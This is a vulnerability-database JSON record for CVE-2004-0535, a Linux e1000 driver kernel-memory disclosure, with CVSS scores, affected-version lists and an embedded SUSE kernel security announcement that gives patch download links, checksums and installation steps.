                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:pre9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23_ow2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.1:*:ppc:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0535"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Chris Wright",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-072"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2004-0535",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.1,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2004-0535",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-8965",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2004-0535",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200408-072",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-8965",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8965"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000194"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0535"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-072"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The e1000 driver for Linux kernel 2.4.26 and earlier does not properly initialize memory before using it, which allows local users to read portions of kernel memory.  NOTE: this issue was originally incorrectly reported as a \"buffer overflow\" by some sources.  This issue is due to a failure of the application to validate user input lengths before processing them.  It might be possible to leverage this issue to access sensitive information from kernel memory. Local attackers can use this vulnerability to carry out buffer overflow attacks, which may destroy memory space information and cause privilege escalation. -----BEGIN PGP SIGNED MESSAGE-----\n\n______________________________________________________________________________\n\n                        SUSE Security Announcement\n\n        Package:                kernel\n        Announcement-ID:        SUSE-SA:2004:020\n        Date:                   Tuesday, Jul 2nd 2004 18:00 MEST\n        Affected products:      8.0, 8.1, 8.2, 9.0, 9.1\n                                SUSE Linux Database Server,\n                                SUSE eMail Server III, 3.1\n                                SUSE Linux Enterprise Server 7, 8\n                                SUSE Linux Firewall on CD/Admin host\n                                SUSE Linux Connectivity Server\n                                SUSE Linux Office Server\n        Vulnerability Type:     local privilege escalation\n        Severity (1-10):        6\n        SUSE default package:   yes\n        Cross References:\tCAN-2004-0495\n\t\t\t\tCAN-2004-0496\n\t\t\t\tCAN-2004-0497\n\t\t\t\tCAN-2004-0535\n\t\t\t\tCAN-2004-0626\n\n\n    Content of this advisory:\n        1) security vulnerability resolved:\n\t\t- chown: users can change the group affiliation of arbitrary\n\t\t  files to the group they belong to\n\t\t- missing DAC check in chown(2): local privilege escalation\n\t        - overflow with signals: local denial-of-service\n        \t- pss, mpu401 sound driver: read/write to complete memory\n\t        - airo driver: read/write to complete memory\n        \t- ALSA: copy_from_user/copy_to_user confused\n        \t- acpi_asus: read from random memory\n        \t- decnet: write to memory without checking\n        \t- e1000 driver: read complete memory\n           problem description, discussion, solution and upgrade information\n        2) pending vulnerabilities, solutions, workarounds:\n\t\t- icecast\n                - sitecopy\n                - cadaver\n                - OpenOffice_org\n                - tripwire\n                - postgresql*\n                - mod_proxy\n\t\t- freeswan\n\t\t- ipsec-tools\n\t\t- less\n\t\t- libpng\n\t\t- pavuk\n\t\t- XFree86*\n\t\t- kdebase3\n        3) standard appendix (further information)\n\n______________________________________________________________________________\n\n1)  problem description, brief discussion, solution, upgrade information\n\n    Multiple security vulnerabilities are being addressed with this security\n    update of the Linux kernel. These \n    vulnerabilities can lead to kernel memory read access, write access \n    and local denial of service conditions, resulting in access to the \n    root account for an attacker with a local account on the affected \n    system. \n\n    Missing Discretionary Access Control (DAC) checks in the chown(2) system\n    call allow an attacker with a local account to change the group\n    ownership of arbitrary files, which leads to root privileges on affected\n    systems. It is specific to kernel version 2.6 based systems such as \n    the SUSE Linux 9.1 product, that only local shell access is needed to \n    exploit this vulnerability. An interesting variant of the missing \n    checks is that the ownership of files in the /proc filesystem can be \n    altered, while the changed ownership still does not allow the files to \n    be accessed as a non-root user for to be able to exploit the \n    vulnerability. Systems that are based on a version 2.4 kernel are not \n    vulnerable to the /proc weakness, and exploitation of the weakness \n    requires the use of the kernel NFS server (knfsd). If the knfsd NFS \n    server is not activated (it is off by default), the vulnerability is \n    not exposed. These issues related to the chown(2) system call have been \n    discovered by Michael Schroeder and Ruediger Oertel, both SUSE LINUX. Found and reported \n    to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability \n    allows a remote attacker to send a specially crafted TCP packet to a \n    vulnerable system, causing that system to stall if it makes use of \n    TCP option matching netfilter rules. \n\n    In some rare configurations of the SUSE Linux 9.1 distribution, some \n    users have experienced stalling systems during system startup. These \n    problems are fixed with this kernel update. \n\n\n\n    SPECIAL INSTALL INSTRUCTIONS:\n    ==============================\n    For the impatient: Run YOU (Yast2 Online Update, command \n    \"yast2 online_update\" as root) to install the updates (semi) \n    automatically, if you have a SUSE Linux 8.1 and newer system. \n\n    For those who wish to install their kernel updates manually and for \n    those who use a SUSE Linux 8.0 system:\n\n    The following paragraphs will guide you through the installation\n    process in a step-by-step fashion. The character sequence \"****\"\n    marks the beginning of a new paragraph. In some cases, the steps\n    outlined in a particular paragraph may or may not be applicable\n    to your situation. \n    Therefore, please make sure to read through all of the steps below\n    before attempting any of these procedures. \n    All of the commands that need to be executed are required to be\n    run as the superuser (root). Each step relies on the steps before\n    it to complete successfully. \n\n\n  **** Step 1: Determine the needed kernel type\n\n    Please use the following command to find the kernel type that is\n    installed on your system:\n\n      rpm -qf /boot/vmlinuz\n\n    Following are the possible kernel types (disregard the version and\n    build number following the name separated by the \"-\" character)\n\n      k_deflt   # default kernel, good for most systems. \n      k_i386    # kernel for older processors and chipsets\n      k_athlon  # kernel made specifically for AMD Athlon(tm) family processors\n      k_psmp    # kernel for Pentium-I dual processor systems\n      k_smp     # kernel for SMP systems (Pentium-II and above)\n      k_smp4G   # kernel for SMP systems which supports a maximum of 4G of RAM\n      kernel-64k-pagesize\n      kernel-bigsmp\n      kernel-default\n      kernel-smp\n\n  **** Step 2: Download the package for your system\n\n    Please download the kernel RPM package for your distribution with the\n    name as indicated by Step 1. The list of all kernel rpm packages is\n    appended below. Note: The kernel-source package does not\n    contain a binary kernel in bootable form. Instead, it contains the\n    sources that the binary kernel rpm packages are created from. It can be\n    used by administrators who have decided to build their own kernel. \n    Since the kernel-source.rpm is an installable (compiled) package that\n    contains sources for the linux kernel, it is not the source RPM for\n    the kernel RPM binary packages. \n\n    The kernel RPM binary packages for the distributions can be found at the\n    locations below ftp://ftp.suse.com/pub/suse/i386/update/. \n\n      8.0/images/\n      8.1/rpm/i586\n      8.2/rpm/i586\n      9.0/rpm/i586\n      9.1/rpm/i586\n\n    After downloading the kernel RPM package for your system, you should\n    verify the authenticity of the kernel rpm package using the methods as\n    listed in section 3) of each SUSE Security Announcement. \n\n\n  **** Step 3: Installing your kernel rpm package\n\n    Install the rpm package that you have downloaded in Steps 3 or 4 with\n    the command\n        rpm -Uhv --nodeps --force \u003cK_FILE.RPM\u003e\n    where \u003cK_FILE.RPM\u003e is the name of the rpm package that you downloaded. \n\n    Warning: After performing this step, your system will likely not be\n             able to boot if the following steps have not been fully\n             followed. \n\n\n    If you run SUSE LINUX 8.1 and haven\u0027t applied the kernel update\n    (SUSE-SA:2003:034), AND you are using the freeswan package, you also\n    need to update the freeswan rpm as a dependency as offered\n    by YOU (YaST Online Update). The package can be downloaded from\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/\n\n  **** Step 4: configuring and creating the initrd\n\n    The initrd is a ramdisk that is loaded into the memory of your\n    system together with the kernel boot image by the bootloader. The\n    kernel uses the content of this ramdisk to execute commands that must\n    be run before the kernel can mount its actual root filesystem. It is\n    usually used to initialize SCSI drivers or NIC drivers for diskless\n    operation. \n\n    The variable INITRD_MODULES in /etc/sysconfig/kernel determines\n    which kernel modules will be loaded in the initrd before the kernel\n    has mounted its actual root filesystem. The variable should contain\n    your SCSI adapter (if any) or filesystem driver modules. \n\n    With the installation of the new kernel, the initrd has to be\n    re-packed with the update kernel modules. Please run the command\n\n      mk_initrd\n\n    as root to create a new init ramdisk (initrd) for your system. \n    On SuSE Linux 8.1 and later, this is done automatically when the\n    RPM is installed. \n\n\n  **** Step 5: bootloader\n\n    If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there\n    are two options:\n    Depending on your software configuration, you have either the lilo\n    bootloader or the grub bootloader installed and initialized on your\n    system. \n    The grub bootloader does not require any further actions to be\n    performed after the new kernel images have been moved in place by the\n    rpm Update command. \n    If you have a lilo bootloader installed and initialized, then the lilo\n    program must be run as root. Use the command\n\n      grep LOADER_TYPE /etc/sysconfig/bootloader\n\n    to find out which boot loader is configured. If it is lilo, then you\n    must run the lilo command as root. If grub is listed, then your system\n    does not require any bootloader initialization. \n\n    Warning: An improperly installed bootloader may render your system\n             unbootable. \n\n  **** Step 6: reboot\n\n    If all of the steps above have been successfully completed on your\n    system, then the new kernel including the kernel modules and the\n    initrd should be ready to boot. The system needs to be rebooted for\n    the changes to become active. Please make sure that all steps have\n    completed, then reboot using the command\n        shutdown -r now\n    or\n        init 6\n\n    Your system should now shut down and reboot with the new kernel. \n\n\n    There is no workaround known. \n\n\n    Please download the update package for your distribution and verify its\n    integrity by the methods listed in section 3) of this announcement. \n    Then, install the package using the command \"rpm -Fhv file.rpm\" to apply\n    the update. \n    Our maintenance customers are being notified individually. The packages\n    are being offered to install from the maintenance web. \n\n\n\n\n\n    x86 Platform:\n\n    SUSE Linux 9.1:\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.95.i586.rpm\n      800418d3dddf6d3b83925f562842205a\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.95.i586.rpm\n      0cb990b159e10685bb29b76d312ddd25\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm\n      7446bb70f52bce57a914066be4ed8e45\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm\n      7446bb70f52bce57a914066be4ed8e45\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.95.i586.rpm\n      ede031495ee19d8b6eca1873e7155332\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm\n      620ef40226fec31a773397cf3051bf36\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm\n      9b61b5a70b304f5554cb18a6bae5b5fd\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.95.nosrc.rpm\n      227c85280ee17a66c8590fe1bb14c596\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm\n      895fee3033de0810ff1173ce8ee87936\n\n    SUSE Linux 9.0:\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-231.i586.rpm\n      48be395b96329909486ae3a5152348fa\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-231.i586.rpm\n      4cd322b4f511d5fe4c483ed28a82097e\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-231.i586.rpm\n      262e33cebf1b0d35fb6d3235c9ab8815\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-231.i586.rpm\n      8d81370f90736b12aa71b9c744f6e0e2\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-231.i586.rpm\n      bc59c838c84ba318dc4d24da08a3022e\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-231.i586.rpm\n      f9586ba982e0398c3e48871955b661aa\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm\n      18673b0bf347fe9557d4e67ca02000c0\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-231.src.rpm\n      71496daac44196b0e0a3836ee6a3b4ed\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm\n      7c208e9e3f7be1a68c3c8457eb2cafc4\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-231.src.rpm\n      b77863c863aaf4b931bff263220e6ec9\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-231.src.rpm\n      bed7e964e22c5e5d2f5e7a5e3816dde4\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm\n      6b5137bf379fbfc861441151039575da\n\n    SUSE Linux 8.2:\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-115.i586.rpm\n      50d261b44616f9145a0dc16df501a504\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-115.i586.rpm\n      10095854c0bdae20991d90b822352e14\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-115.i586.rpm\n      a2ef7cfb0e62ad955dda2b0574eb3150\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-115.i586.rpm\n      1d2b0d0e2c7998685ed04c24e593b196\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-115.i586.rpm\n      d8bf98c46ba5313db286d5706f7fb3b8\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-115.src.rpm\n      e13a7b4c2b185cfeb991c31607f79ccb\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-115.src.rpm\n      0e2f2cf20e7d7a20f3e50b245105df61\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-115.src.rpm\n      6cfac2914d3827ec562ff9d6be29c566\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-115.src.rpm\n      afd29843aa69d805ef5f25d39ecd0e7f\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-115.src.rpm\n      098a1400a48404931acb8b3eb2e821fb\n\n    SUSE Linux 8.1:\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-231.i586.rpm\n      3bdaa593d09a7cbff632a2c4446d5603\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-231.i586.rpm\n      ba60d0b2b6d3bc9c38b4e8b3859e1586\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-231.i586.rpm\n      ffa8983669004826a0cbedbe34dced76\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-231.i586.rpm\n      25174fd007f5a39ee0342dd6f18f2eaa\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-231.i586.rpm\n      10837fa561cd5104e55d48e46c837764\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-231.src.rpm\n      c37e8b87819602e77b14206affef00fa\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-231.src.rpm\n      7be68a677db5a65be1a46ec194b35497\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-231.src.rpm\n      8e4b7d5a6bb81da5a00971cdcc4ec641\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-231.src.rpm\n      d8ba1db81a9b517f867c970e4fc443a7\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-231.src.rpm\n      96a0a9242d066083c7bff8e0f70b7bbe\n\n    SUSE Linux 8.0:\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-303.i386.rpm\n      ec1e53b3812c0c0bd3681435d69fb134\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-303.i386.rpm\n      583164e52019ae090fd47e425c2a933e\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-303.i386.rpm\n      9ac8983abef05697d75f3117e37e5f18\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-303.i386.rpm\n      4932c4d6a42fc9be02013f398ab5bb96\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-303.i386.rpm\n      b9de0731f9bbc4b016455a6d52cd8296\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-303.src.rpm\n      a73bacad80432c26e856c41338b154bd\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-303.src.rpm\n      782902cd14e7776db66bd61a12beee03\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-303.src.rpm\n      d71fa5cda488ae18f8d023cd8f28bb73\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-303.src.rpm\n      a360a9e6ed2db54f69e17db36f02614f\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-303.nosrc.rpm\n      8017fd6ff8a6fc1a0660ab35ad174388\n\n\n\n    x86-64 Platform:\n\n    SUSE Linux 9.1:\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.95.x86_64.rpm\n      e2c53fd24991f739fd754c07f7aa8293\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.95.x86_64.rpm\n      f4a69622b7628cdd662a4e39aa59b60e\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.95.x86_64.rpm\n      e71adfb1fc662600eb11d3acf67c3dc3\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm\n      f6a364879d1f2ae2cf854810d61be3ac\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm\n      a0096d1fc067d89c9200ea3904713d59\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm\n      bf6d0439cfc37b50b4f6822c3403a74f\n\n    SUSE Linux 9.0:\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-231.x86_64.rpm\n      17e008a737e5e95e71335e34fa7f86cf\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-231.x86_64.rpm\n      ca742b550b1a503595b02cbfc9e0e481\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-231.x86_64.rpm\n      8e0c16c42d1a89aa6a09be1dd575de47\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm\n      58b1bf42b5661119d06a04888144707a\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm\n      5103001136e39fca5a59f4cbde82822b\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm\n      231c9e5e00f17df8cfd72d6c8a68d9cf\n\n\n______________________________________________________________________________\n\n2)  Pending vulnerabilities in SUSE Distributions and Workarounds:\n\n    - icecast\n    The icecast service is vulnerable to a remote denial-of-service\n    attack. Update packages will be available soon. \n\n    - sitecopy\n    The sitecopy package includes a vulnerable version of the\n    neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\n    available soon. \n\n    - cadaver\n    The cadaver package includes a vulnerable version of the\n    neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\n    available soon. \n\n    - OpenOffice_org\n    The OpenOffice_org package includes a vulnerable version\n    of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages\n    will be available soon. \n\n    - tripwire\n    A format string bug in tripwire can be exploited locally\n    to gain root permissions. \n    New packages are available. \n\n    - postgresql\n    A buffer overflow in psqlODBC could be exploited to crash the\n    application using it. E.g. a PHP script that uses ODBC to access a\n    PostgreSQL database can be utilized to crash the surrounding Apache\n    web-server. Other parts of PostgreSQL are not affected. \n    New packages are available. \n\n    - XDM/XFree86\n    This update resolves random listening to ports by XDM\n    that allows to connect via the XDMCP. SUSE LINUX 9.1\n    is affected only. \n    New packages are available. \n\n    - mod_proxy\n    A buffer overflow can be triggered by malicious remote\n    servers that return a negative Content-Length value. \n    This vulnerability can be used to execute commands remotely\n    New packages are available. \n\n    - freeswan\n    A bug in the certificate chain authentication code could allow an\n    attacker to authenticate any host against a FreeS/WAN server by\n    presenting specially crafted certificates wrapped in a PKCS#7 file. \n    The packages are currently being tested and will be available soon. \n\n    - ipsec-tools\n    The racoon daemon which is responsible for handling IKE messages\n    fails to reject invalid or self-signed X.509 certificates which\n    allows for man-in-the-middle attacks on IPsec tunnels established\n    via racoon. \n    The packages are currently being tested and will be available soon. \n\n    - less\n    This update fixes a possible symlink attack in lessopen.sh. The\n    attack can be executed by local users to overwrite arbitrary files\n    with the privileges of the user running less. \n    New packages are available. \n\n    - libpng\n    This update adds a missing fix for CAN-2002-1363. \n    New packages are available. \n\n    - pavuk\n    This update fixes a remotely exploitable buffer overflow in pavuk. \n    Thanks to Ulf Harnhammar for reporting this to us. \n    New packages are available. \n\n    - kdebase3\n    This update fixes a possible attack on tmp files created at the\n    first login of a user using KDE or at the first time running a\n    KDE application. This bug can be exploited locally to overwrite\n    arbitrary files with the privilege of the victim user. \n    Just affects SUSE LINUX 9.1\n    New packages are available. \n\n______________________________________________________________________________\n\n3)  standard appendix: authenticity verification, additional information\n\n  - Package authenticity verification:\n\n    SUSE update packages are available on many mirror ftp servers around\n    the world. While this service is considered valuable and important\n    to the free and open source software community, many users wish to be\n    certain as to be the origin of the package and its content before\n    installing the package. There are two independent verification methods\n    that can be used to prove the authenticity of a downloaded file or\n    rpm package:\n    1) md5sums as provided in the (cryptographically signed) announcement. \n    2) using the internal gpg signatures of the rpm package. \n\n    1) execute the command\n        md5sum \u003cname-of-the-file.rpm\u003e\n       after you have downloaded the file from a SUSE ftp server or its\n       mirrors. Then, compare the resulting md5sum with the one that is\n       listed in the announcement. Since the announcement containing the\n       checksums is cryptographically signed (usually using the key\n       security@suse.de), the checksums offer proof of the authenticity\n       of the package. \n       We recommend against subscribing to security lists which cause the\n       email message containing the announcement to be modified so that\n       the signature does not match after transport through the mailing\n       list software. \n       Downsides: You must be able to verify the authenticity of the\n       announcement in the first place. If RPM packages are being rebuilt\n       and a new version of a package is published on the ftp server, all\n       md5 sums for the files are useless. \n\n    2) rpm package signatures provide an easy way to verify the authenticity\n       of an rpm package. Use the command\n        rpm -v --checksig \u003cfile.rpm\u003e\n       to verify the signature of the package, where \u003cfile.rpm\u003e is the\n       filename of the rpm package that you have downloaded. Of course,\n       package authenticity verification can only target an un-installed rpm\n       package file. \n       Prerequisites:\n        a) gpg is installed\n        b) The package is signed using a certain key. The public part of this\n           key must be installed by the gpg program in the directory\n           ~/.gnupg/ under the user\u0027s home directory who performs the\n           signature verification (usually root). You can import the key\n           that is used by SUSE in rpm packages for SUSE Linux by saving\n           this announcement to a file (\"announcement.txt\") and\n           running the command (do \"su -\" to be root):\n            gpg --batch; gpg \u003c announcement.txt | gpg --import\n           SUSE Linux distributions version 7.1 and thereafter install the\n           key \"build@suse.de\" upon installation or upgrade, provided that\n           the package gpg is installed. The file containing the public key\n           is placed at the top-level directory of the first CD (pubring.gpg)\n           and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de . \n\n\n  - SUSE runs two security mailing lists to which any interested party may\n    subscribe:\n\n    suse-security@suse.com\n        -   general/linux/SUSE security discussion. \n            All SUSE security announcements are sent to this list. \n            To subscribe, send an email to\n                \u003csuse-security-subscribe@suse.com\u003e. \n\n    suse-security-announce@suse.com\n        -   SUSE\u0027s announce-only mailing list. \n            Only SUSE\u0027s security announcements are sent to this list. \n            To subscribe, send an email to\n                \u003csuse-security-announce-subscribe@suse.com\u003e. \n\n    For general information or the frequently asked questions (faq)\n    send mail to:\n        \u003csuse-security-info@suse.com\u003e or\n        \u003csuse-security-faq@suse.com\u003e respectively. \n\n    =====================================================================\n    SUSE\u0027s security contact is \u003csecurity@suse.com\u003e or \u003csecurity@suse.de\u003e. \n    The \u003csecurity@suse.de\u003e public key is listed 